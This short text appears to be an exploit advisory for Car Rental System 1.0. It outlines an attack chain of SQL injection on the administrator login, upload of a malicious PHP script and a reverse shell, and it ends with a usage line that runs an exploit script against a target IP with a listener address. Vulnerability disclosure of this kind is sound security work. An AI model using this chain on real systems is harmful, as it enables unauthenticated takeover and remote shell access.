Car Rental System 1.0 suffers from SQL Injection on administrator login page and unsecure upload mechanism allowing to upload malicious PHP files.
This allows unauthenticated user to obtain administartor account and reverse shell to the application.
Vulnerabilites are used in the following steps:
- SQL Injection attack on the login form
- Upload the PHP code execution script
- Send the reverse shell payload
python3 CRS.py -t 192.168.1.120 -p 80 -L 192.168.1.100 -P 80